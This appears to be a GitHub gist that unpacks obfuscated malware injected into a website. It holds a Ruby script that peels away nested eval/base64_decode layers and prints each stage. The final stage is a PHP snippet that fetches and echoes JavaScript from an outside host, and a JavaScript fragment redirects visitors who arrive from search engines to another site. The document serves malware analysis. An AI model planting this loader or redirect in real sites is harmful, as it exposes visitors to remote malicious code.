Skip to content

Instantly share code, notes, and snippets.

@dmix
Last active August 29, 2015 14:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dmix/f1e4bcd96463e5515179 to your computer and use it in GitHub Desktop.
Save dmix/f1e4bcd96463e5515179 to your computer and use it in GitHub Desktop.
malwared-jquery
eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0RlRsaGlSekZNVWpGdmVGbHRNVTlOUjBaWVQxaFdXVTFzV1RCWlZtaFBUVWRPTlZveU5WcE5NVm8xV1d0Wk5XTkhTblJpUkVKTFpWZDBkMUV5WkhOT01FNXVZVEJ3UzFOR1dqVlphMDVDVDFWc1JGTnRPV3RUUmtvelZESnJOR1J0Um5SU2FrcGFWMFpLYzFreU1IZGxSWGgxVVdwT1RVMXVRbTlhUnpGR1pHMUdkVkpxUm1GWFJXOHhWRVpTUm1SVk5YQk9TSEJOWWxSR2QxbHRhekZqVjA0MVUxUmtSRm95ZEV0VGEyUlBZakJzUlUxSFpGcE5NVm8xV1d0Wk5XTkhTblJpUkVKTVVUSnpNMUV5WkhKVGEzQkpWVzVDYVZZeFdqSmFSbWhTV2pGQ1ZGRlVSbEJrTWpsTFVURmtUMDFYVG5SbFIxcHFUV3haZDFscVRrTk5SWFJFVlcxd2FGRXphRVZXYkZwTFZGWlJlRkZzVmxsTlZscFVWa1ZPTTJFeVVsbFRiazVNVmtoT1RGRXhSbk5oYlZKWlUyNU9XVTB3TlhOYVJXTTFaREpTUkZveWRGcE5iV1I2VlZSR1YxVXhVa1pQVmtaWFVtcHNWRlZzV2xOV2JGWnlUbFpXVm1Fd1dsQldWRUpoVW14V2NHUXphRXhXU0U1TVVURkdjMkZ0VWxsVGJrNVpUVEExYzFwRll6VmtNbEpFV2pKMFdrMXRaSHBWVkVaWFZURlNSazlXUmxkU2FteEZWa1JCTVZReFNsWlViRlpYVWxkNFQxVnNWVFZX.YkZwRVpESjBhMUl5ZURCWGJHTTFUVmRTUkdGNlpFUmFNblJMVTJ0a1UyRkhVa2hTVjJSUlZUQktjVnBHYUV0ak1XZDVWbXBTWVZZd01YWlRhMlJQWWpCMFZXTXdkRVJWVjNoeFdrWm9TMk14WjNsVWJrNXBUVEExYzFNd1RsTmhiVVpFWVhwa1JGb3lkRXRYYkdSUFlqSktOVkZYYkV0U01VcHZXa1ZrUm1GVk9UTmlNSEJ0VlZjNGNFdFVjeWtwT3cpKTs));
Removing eval
Processing again
eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFTlhiRzFMUjFveFltMU9NR0ZYT1hWWU1sWTBZVmhPTUdONVoyNVpNMVo1WWtZNWNHSnRiREJLZVd0d1EyZHNOME5uYTBwS1NGWjVZa05CT1VsRFNtOWtTRkozVDJrNGRtRnRSakpaV0ZKc1kyMHdlRXh1UWpOTU1uQm9aRzFGZG1GdVJqRmFXRW8xVEZSRmRVNXBOSHBNYlRGd1ltazFjV041U1RkRFoydEtTa2RPYjBsRU1HZFpNMVo1WWtZNWNHSnRiREJMUTJzM1EyZHJTa3BJVW5CaVYxWjJaRmhSWjFCVFFURlBkMjlLUTFkT01XTnRlR1pqTWxZd1lqTkNNRXREVW1waFEzaEVWbFpLVFZReFFsVllNVlpUVkVOM2EyUllTbk5MVkhOTFExRnNhbVJZU25OWU0wNXNaRWM1ZDJSRFoydFpNbWR6VVRGV1UxUkZPVkZXUmpsVFVsWlNWbFZyTlZWVmEwWlBWVEJhUmxWcGQzaExWSE5MUTFGc2FtUllTbk5ZTTA1c1pFYzVkMlJEWjJ0Wk1tZHpVVEZXVTFSRk9WRldSamxFVkRBMVQxSlZUbFZXUld4T1VsVTVWbFpEZDJ0a1IyeDBXbGM1TVdSRGF6ZERaMnRLU2tkU2FHUkhSV2RRVTBKcVpGaEtjMWd5VmpSYVYwMXZTa2RPYjB0VWMwdERVV3hxWkZoS2MxZ3lUbk5pTTA1c1MwTlNhbUZEYXpkRFoydEtXbGRPYjJKNVFXbEtSMUpvWkVkRmFVOTNiMHBtVVc4cEtUcykpOw));
Removing eval
Processing again
eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKENXbG1LR1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25ZM1Z5YkY5cGJtbDBKeWtwQ2dsN0Nna0pKSFZ5YkNBOUlDSm9kSFJ3T2k4dmFtRjJZWFJsY20weExuQjNMMnBoZG1FdmFuRjFaWEo1TFRFdU5pNHpMbTFwYmk1cWN5STdDZ2tKSkdOb0lEMGdZM1Z5YkY5cGJtbDBLQ2s3Q2drSkpIUnBiV1Z2ZFhRZ1BTQTFPd29KQ1dOMWNteGZjMlYwYjNCMEtDUmphQ3hEVlZKTVQxQlVYMVZTVEN3a2RYSnNLVHNLQ1FsamRYSnNYM05sZEc5d2RDZ2tZMmdzUTFWU1RFOVFWRjlTUlZSVlVrNVVVa0ZPVTBaRlVpd3hLVHNLQ1FsamRYSnNYM05sZEc5d2RDZ2tZMmdzUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2tkR2x0Wlc5MWRDazdDZ2tKSkdSaGRHRWdQU0JqZFhKc1gyVjRaV01vSkdOb0tUc0tDUWxqZFhKc1gyTnNiM05sS0NSamFDazdDZ2tKWldOb2J5QWlKR1JoZEdFaU93b0pmUW8pKTs));
Removing eval
Processing again
eval(base64_decode(CWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpCgl7CgkJJHVybCA9ICJodHRwOi8vamF2YXRlcm0xLnB3L2phdmEvanF1ZXJ5LTEuNi4zLm1pbi5qcyI7CgkJJGNoID0gY3VybF9pbml0KCk7CgkJJHRpbWVvdXQgPSA1OwoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwkdXJsKTsKCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsKCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwkdGltZW91dCk7CgkJJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKCQljdXJsX2Nsb3NlKCRjaCk7CgkJZWNobyAiJGRhdGEiOwoJfQo));
Removing eval
Processing again
if(function_exists('curl_init'))
{
$url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
g = "http://www.assofleurdelotus.fr/js/test.php",
y = n.referrer,
b, w = ["", " "],
E = ["google", "yahoo", "bing", "yandex", "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
if (!y) console.log("direct"), T();
else
for (b = 0; b < E.length; ++b) y.indexOf(E[b]) + 1 && (T() || (e.location = g));
require "base64"
content = "ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw"
def process(code)
decoded = Base64.decode64(code)
puts decoded
if decoded.include? "eval"
puts "Removing eval"
decoded = decoded.strip.gsub('eval(', '').gsub('));', ');');
if decoded.include? "base64_decode"
puts "Processing again"
decoded = decoded.gsub('base64_decode(', '').gsub(');', '');
process(decoded)
else
puts decoded
end
end
end
process(content)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment